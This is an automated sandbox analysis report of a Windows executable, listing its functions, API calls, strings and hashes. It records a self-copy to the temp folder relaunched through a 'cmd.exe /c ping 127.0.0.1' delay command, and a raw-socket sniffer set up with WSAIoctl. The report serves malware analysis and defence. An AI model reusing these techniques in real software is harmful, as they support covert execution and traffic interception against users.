wsprintfA CreateDirectoryA Sleep memset 746->747 748 40174f 4 API calls 747->748 749 401b5d 7 API calls 748->749 749->744 768 402694 750->768 753->731 766 402ee0 754->766 757 4017fb 757->735 757->736 758 4017ff 759 401808 memset ReadFile 758->759 760 401856 CloseHandle 759->760 761 401837 memcpy 759->761 760->757 761->759 763 40178b 762->763 764 401794 rand 763->764 765 4017ab 17 API calls 763->765 764->764 764->765 767 4017bf CreateFileA 766->767 767->757 767->758 769 40284f 768->769 770 402873 769->770 771 40285d TerminateThread CloseHandle 769->771 772 401d0f #693 #609 #641 770->772 773 40287a closesocket 770->773 771->770 772->728 773->772 774 401a2a 775 401a2d FindResourceA 774->775 776 401a60 775->776 777 401a52 LoadResource 775->777 777->776 778 401a67 SizeofResource LockResource memcpy 777->778 779 401ac9 778->779 783 401a98 778->783 780 40174f 4 API calls 779->780 781 401b15 wsprintfA CreateDirectoryA Sleep memset 780->781 782 40174f 4 API calls 781->782 784 401b5d 7 API calls 782->784 783->779 784->776 834 40246a #3092 835 4024b1 834->835 837 402483 834->837 851 40284f 835->851 842 40271c socket 837->842 839 4024cc 840 4024c5 #6199 840->839 841 4024a5 841->839 841->840 843 402742 gethostname 842->843 844 40280f WSAGetLastError 842->844 843->844 845 40275d gethostbyname htons memcpy bind 843->845 850 402846 844->850 845->844 846 4027ad setsockopt setsockopt 845->846 846->844 847 4027e2 WSAIoctl 846->847 847->844 848 402817 CreateThread 847->848 849 402831 closesocket 848->849 848->850 849->850 850->841 852 402873 851->852 853 40285d TerminateThread CloseHandle 851->853 854 402881 852->854 855 40287a closesocket 852->855 853->852 854->841 855->854 906 402b2c 911 402b48 906->911 908 402b34 909 402b42 908->909 910 402b3b #825 908->910 910->909 912 402b54 WSACleanup 911->912 913 402b59 911->913 912->908 913->908 991 4030ef 992 4030f4 991->992 995 4030c6 #1168 992->995 996 4030e0 _setmbcp 995->996 997 4030e9 995->997 996->997 1051 4026b0 1054 4026bd 1051->1054 1052 402711 1053 4026c8 recv 1053->1054 1055 4026e4 WSAGetLastError 1053->1055 1054->1052 1054->1053 1055->1052 1055->1054 856 401672 EnableWindow 857 403074 _exit 858 402575 #2379 861 4024df GetClientRect _ftol _ftol 858->861 862 402539 861->862 863 40254e 861->863 862->863 864 40253f #4299 862->864 865 402570 863->865 866 40255e #4299 863->866 864->863 866->865 867 402678 868 402694 ctype 3 API calls 867->868 869 402680 868->869 870 402687 #825 869->870 871 40268e 869->871 870->871 923 402138 IsIconic 924 4021c9 #2379 923->924 925 40214e 7 API calls 923->925 926 4021d0 924->926 925->926 1004 4025f8 #609 1005 402607 #825 1004->1005 1006 40260e 1004->1006 1005->1006 1007 4010fe #2302 #2302 #2302 1056 401dbe 1061 401dda _EH_prolog #800 #641 1056->1061 1058 401dc6 1059 401dd4 1058->1059 1060 401dcd #825 1058->1060 1060->1059 1061->1058 927 40243f 928 402442 LeaveCriticalSection #800 927->928

                                                        Executed Functions

                                                        Function 00401A2A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00401B38
                                                        • Sleep.KERNEL32(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: Resource$wsprintf$CreateDirectoryFindLoadLockSizeofSleepmemcpymemset
                                                        • String ID: IMAGE
                                                        • API String ID: 3931793037-845793007
                                                        • Opcode ID: d3edc049732555914adbff52832aa4292bf647af716a8d02043898333d2fcd6f
                                                        • Instruction ID: 4f975884327954dfad89ea398a43f93018ff4a6e72412e49f1d32c0e5fd34b6a
                                                        • Opcode Fuzzy Hash: d3edc049732555914adbff52832aa4292bf647af716a8d02043898333d2fcd6f
                                                        • Instruction Fuzzy Hash: 0AE04F673041646AE22026B96DC995B6A6CC2C57EAB110537FB43F219094748C0545B9
                                                        Function 00401867 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 151sleepfileprocessCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • #823.MFC42(00100000), ref: 00401879
                                                        • memset.MSVCRT ref: 00401888
                                                        • __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 004017B2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 004017B2: memset.MSVCRT ref: 00401814
                                                          • Part of subcall function 004017B2: ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 0040182C
                                                          • Part of subcall function 004017B2: memcpy.MSVCRT(?,?,?), ref: 00401847
                                                          • Part of subcall function 004017B2: CloseHandle.KERNELBASE(?), ref: 00401859
                                                        • Sleep.KERNEL32(00000064), ref: 004018CE
                                                        • GetTickCount.KERNEL32 ref: 00401906
                                                        • GetTempPathA.KERNELBASE(00000104,?), ref: 00401936
                                                        • wsprintfA.USER32 ref: 00401953
                                                        • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                        • #823.MFC42(?), ref: 0040197F
                                                        • Sleep.KERNELBASE(00000064), ref: 0040198A
                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004019A0
                                                        • Sleep.KERNELBASE(00000064), ref: 004019A4
                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004019B4
                                                        • CloseHandle.KERNELBASE(?), ref: 004019B9
                                                        • #825.MFC42(?), ref: 004019C2
                                                        • #825.MFC42(?,?), ref: 004019CA
                                                        • __p___argv.MSVCRT ref: 004019E7
                                                        • wsprintfA.USER32 ref: 00401A04
                                                        • WinExec.KERNEL32(?,00000000), ref: 00401A15
                                                        • Sleep.KERNELBASE(000001F4), ref: 00401A20
                                                        • ExitProcess.KERNEL32 ref: 00401A24
                                                        Strings
                                                        • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 004019FE
                                                        • %s\%s.exe, xrefs: 0040194D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: File$Sleep$__p___argv$#823#825CloseCreateHandleWritememsetwsprintf$CountExecExitPathProcessReadTempTickmemcpy
                                                        • String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                        • API String ID: 4283993690-2816570591
                                                        • Opcode ID: ab959de17b0fb4db71de5dd11ebeeed1c3cf6ecd018e597a28ae6875c8dd4de7
                                                        • Instruction ID: 647a47b4171ebbf043bbf0605c80f25e9859b4608e82af673633275921c822a3
                                                        • Opcode Fuzzy Hash: ab959de17b0fb4db71de5dd11ebeeed1c3cf6ecd018e597a28ae6875c8dd4de7
                                                        • Instruction Fuzzy Hash: EB515EB2900109BFEB11ABE4DD49EDEBB79EF88300F1004B6F704B61A1DB755A548F69
                                                        Function 00402F22 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                        • String ID: `@
                                                        • API String ID: 801014965-3559765445
                                                        • Opcode ID: 554b2b36ebdbdca76e7e5890daf673f7ab6b653fcba5f1f76f6d923fca04a6ed
                                                        • Instruction ID: fd41096d9372b4dda24e723cd552983fee23a0ad75fa497c59ca918bbf17219f
                                                        • Opcode Fuzzy Hash: 554b2b36ebdbdca76e7e5890daf673f7ab6b653fcba5f1f76f6d923fca04a6ed
                                                        • Instruction Fuzzy Hash: 26418BB0941208AFDB209FA4D945AAA7BBCEB49711B20053FF942B72E5D67949408B28
                                                        Function 004017B2 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 30 4017b2-4017f9 call 402ee0 CreateFileA 33 4017fb-4017fd 30->33 34 4017ff-401803 30->34 35 401863-401866 33->35 36 401808-401835 memset ReadFile 34->36 37 401856-401862 CloseHandle 36->37 38 401837-401854 memcpy 36->38 37->35 38->36
                                                        APIs
                                                        • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • memset.MSVCRT ref: 00401814
                                                        • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 0040182C
                                                        • memcpy.MSVCRT(?,?,?), ref: 00401847
                                                        • CloseHandle.KERNELBASE(?), ref: 00401859
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleReadmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3052882905-0
                                                        • Opcode ID: 017f0ce2d653050c7a9920fa0cc463a4687a2ca091f219d135d742b73b5de0a5
                                                        • Instruction ID: e342418d90b68a1d807531b6c152f1c53a72d441e6209e681be522bd43cf2dcc
                                                        • Opcode Fuzzy Hash: 017f0ce2d653050c7a9920fa0cc463a4687a2ca091f219d135d742b73b5de0a5
                                                        • Instruction Fuzzy Hash: 8111BEB2900148BFDB119F98CC81BDA37ADEB08355F108076F709F6190D2B0AF848B68
                                                        Function 00401C6A Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401C6F
                                                        • #1134.MFC42(00000000), ref: 00401C7F
                                                          • Part of subcall function 00401E2A: _EH_prolog.MSVCRT ref: 00401E2F
                                                          • Part of subcall function 00401E2A: #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                          • Part of subcall function 00401E2A: #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                          • Part of subcall function 00401E2A: #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
                                                          • Part of subcall function 00401E2A: LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        • __p___argv.MSVCRT ref: 00401C9F
                                                        • ExitProcess.KERNEL32 ref: 00401CBE
                                                          • Part of subcall function 00401867: #823.MFC42(00100000), ref: 00401879
                                                          • Part of subcall function 00401867: memset.MSVCRT ref: 00401888
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 00401867: __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 00401867: Sleep.KERNEL32(00000064), ref: 004018CE
                                                          • Part of subcall function 00401867: GetTickCount.KERNEL32 ref: 00401906
                                                          • Part of subcall function 00401867: GetTempPathA.KERNELBASE(00000104,?), ref: 00401936
                                                          • Part of subcall function 00401867: wsprintfA.USER32 ref: 00401953
                                                          • Part of subcall function 00401867: CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                          • Part of subcall function 00401867: #823.MFC42(?), ref: 0040197F
                                                        • #2514.MFC42 ref: 00401CCA
                                                          • Part of subcall function 00401CEC: _EH_prolog.MSVCRT ref: 00401CF1
                                                          • Part of subcall function 00401CEC: #693.MFC42(?,?,00401CDE), ref: 00401D19
                                                          • Part of subcall function 00401CEC: #609.MFC42(?,?,00401CDE), ref: 00401D25
                                                          • Part of subcall function 00401CEC: #641.MFC42(?,?,00401CDE), ref: 00401D30
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: H_prolog__p___argv$#567#823$#1134#1146#1168#2514#324#609#641#693CountCreateExitFileIconLoadPathProcessSleepTempTickmemsetwsprintf
                                                        • String ID:
                                                        • API String ID: 4041608318-0
                                                        • Opcode ID: cf390052f602c471bc6786218be2683cf026073658c5c6fef72292eb93939f19
                                                        • Instruction ID: 6f737f08b995e68c62b9dff43b60cf904c1485ff509acee86472e34ce1649ac1
                                                        • Opcode Fuzzy Hash: cf390052f602c471bc6786218be2683cf026073658c5c6fef72292eb93939f19
                                                        • Instruction Fuzzy Hash: 17016D319511158BEB14FB65C90A7DCB7B4AF08328F0042BAA465B21E1EF789A45CA58
                                                        Function 00402B5A Relevance: 4.5, APIs: 3, Instructions: 29networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 69 402b5a-402b7a WSAStartup 70 402ba3 WSAGetLastError 69->70 71 402b7c-402b82 69->71 74 402ba9-402bac 70->74 72 402b84-402b90 71->72 73 402b9d WSACleanup 71->73 72->73 75 402b92-402b9b 72->75 73->70 75->74
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: CleanupErrorLastStartup
                                                        • String ID:
                                                        • API String ID: 286295645-0
                                                        • Opcode ID: b0ec8336bf00a6052941da9178b3fceddae8ddc46f726d68ca548fb70960ad9d
                                                        • Instruction ID: 2be7791f72972009722b799a77b565cb98efc3fc237316151d06e583dd982ed8
                                                        • Opcode Fuzzy Hash: b0ec8336bf00a6052941da9178b3fceddae8ddc46f726d68ca548fb70960ad9d
                                                        • Instruction Fuzzy Hash: 1FF0EC715002186FDB206F35DE1CAD77BF89B0C355F005476E54AE3181D67468458758
                                                        Function 004030AE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 76 4030ae-4030c3 #1576
                                                        APIs
                                                        • #1576.MFC42(?,?,?,V0@,00403056,00000000,?,0000000A), ref: 004030BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #1576
                                                        • String ID: V0@
                                                        • API String ID: 1976119259-1055587443
                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                        • Instruction ID: 091081438a8891efaa48dbd6cf97df1c67080aae43ea6bdf83243b43297a0175
                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                        • Instruction Fuzzy Hash: 51B00836018396ABCB02DF91880192ABEA6BB98705F488C1DB2A1140A187768538EB16

                                                        Non-executed Functions

                                                        Function 0040229F Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 165windowtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004022A4
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 0040290F
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402920
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402927
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402932
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402939
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 0040299E
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 004029A8
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00402305
                                                        • #540.MFC42 ref: 0040230E
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402323
                                                        • #3998.MFC42(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402342
                                                        • #6907.MFC42(?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402352
                                                        • #6907.MFC42(?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402362
                                                        • #2818.MFC42(?,%d/%d,?,?,?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000), ref: 00402376
                                                        • #6907.MFC42(?,00000003,?,00000000), ref: 00402388
                                                        • GetSystemTime.KERNEL32(?,?,00000003,?,00000000), ref: 00402391
                                                        • #2818.MFC42(?,%2.2d-%2.2d %2.2d:%2.2d:%2.2d,?,?,?,?,?), ref: 004023B9
                                                        • #6907.MFC42(?,00000004,?), ref: 004023CB
                                                        • #6007.MFC42(?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 004023DD
                                                        • #823.MFC42(00000008,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 004023E8
                                                        • #823.MFC42(?,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 00402408
                                                        • memcpy.MSVCRT(00000000,?,?,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,00000004,?), ref: 0040241B
                                                        • #6007.MFC42(?,00000000,00000004,00000000,00000000,00000000,00000000,?,?,00000004,?), ref: 00402432
                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000000,?,?,00000004,?), ref: 00402449
                                                        • #800.MFC42 ref: 00402456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #6907$strncpy$#2818#6007#823CriticalSectioninet_ntoasprintf$#3998#540#800EnterH_prologLeaveMessageSendSystemTimememcpy
                                                        • String ID: %2.2d-%2.2d %2.2d:%2.2d:%2.2d$%d/%d
                                                        • API String ID: 53958731-669394826
                                                        • Opcode ID: 237fc60831bdeb9d19871970aaccf79bb7805ddc871af4d619914d0d9ebb9e60
                                                        • Instruction ID: aa3e698a986a9efcd30e7cd5d6354eb5ceda86bede962053babdd167d9a98621
                                                        • Opcode Fuzzy Hash: 237fc60831bdeb9d19871970aaccf79bb7805ddc871af4d619914d0d9ebb9e60
                                                        • Instruction Fuzzy Hash: 935148B2900209AEDF119FA5CD4AEEFBB7DFB48308F00442AF605B61D1D6B95D04CB64
                                                        Function 0040271C Relevance: 18.1, APIs: 12, Instructions: 109networkthreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 157 40271c-40273c socket 158 402742-402757 gethostname 157->158 159 40280f-402815 WSAGetLastError 157->159 158->159 161 40275d-4027ab gethostbyname htons memcpy bind 158->161 160 402848-40284c 159->160 161->159 162 4027ad-4027e0 setsockopt * 2 161->162 162->159 163 4027e2-40280d WSAIoctl 162->163 163->159 164 402817-40282f CreateThread 163->164 165 402831-402844 closesocket 164->165 166 402846 164->166 165->160 166->160
                                                        APIs
                                                        • socket.WS2_32(00000002,00000003,00000000), ref: 00402730
                                                        • gethostname.WS2_32(?,00000100), ref: 0040274E
                                                        • gethostbyname.WS2_32(?), ref: 00402764
                                                        • htons.WS2_32(?), ref: 00402779
                                                        • memcpy.MSVCRT(?,?,?), ref: 00402791
                                                        • bind.WS2_32(?,00000002,00000010), ref: 004027A2
                                                        • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 004027C9
                                                        • setsockopt.WS2_32(?,00000000,00000002,?,00000004), ref: 004027DB
                                                        • WSAIoctl.WS2_32(?,98000001,?,00000004,?,00000028,?,00000000,00000000), ref: 00402804
                                                        • WSAGetLastError.WS2_32 ref: 0040280F
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000026B0,?,00000000,00000000), ref: 00402824
                                                        • closesocket.WS2_32(?), ref: 00402838
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: setsockopt$CreateErrorIoctlLastThreadbindclosesocketgethostbynamegethostnamehtonsmemcpysocket
                                                        • String ID:
                                                        • API String ID: 4186165289-0
                                                        • Opcode ID: 901dd120511eaf3c56c0a535516480d7a34dcafb24756b6e58f3c865b715a434
                                                        • Instruction ID: cc647fa9d97eb8ab40f50e3a18fc5453a93f7f03a17443a7d33be6df37dc61fd
                                                        • Opcode Fuzzy Hash: 901dd120511eaf3c56c0a535516480d7a34dcafb24756b6e58f3c865b715a434
                                                        • Instruction Fuzzy Hash: DF3160B6500604AFD7209FA4DD49F9BBBB8EF84720F10862AF625E61E0D7B49944CB54
                                                        Function 00402138 Relevance: 13.6, APIs: 9, Instructions: 63windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                        • String ID:
                                                        • API String ID: 1397574227-0
                                                        • Opcode ID: 1ec0889933b8568e71d179df5b286e334d8a5b22727fd9a6730dc2e2a4000510
                                                        • Instruction ID: ef0e762d43f9ba135a21ed7adfdda79f425eb601d2121b69b903fd342b625570
                                                        • Opcode Fuzzy Hash: 1ec0889933b8568e71d179df5b286e334d8a5b22727fd9a6730dc2e2a4000510
                                                        • Instruction Fuzzy Hash: 95115472610219AFCB10ABB9DE4DEAE77B9FB84340F040139B646E70E0DAB4AD04CB54
                                                        Function 004026B0 Relevance: 3.0, APIs: 2, Instructions: 39networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • recv.WS2_32(?,?,0000FFFF,00000000), ref: 004026D9
                                                        • WSAGetLastError.WS2_32 ref: 004026E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
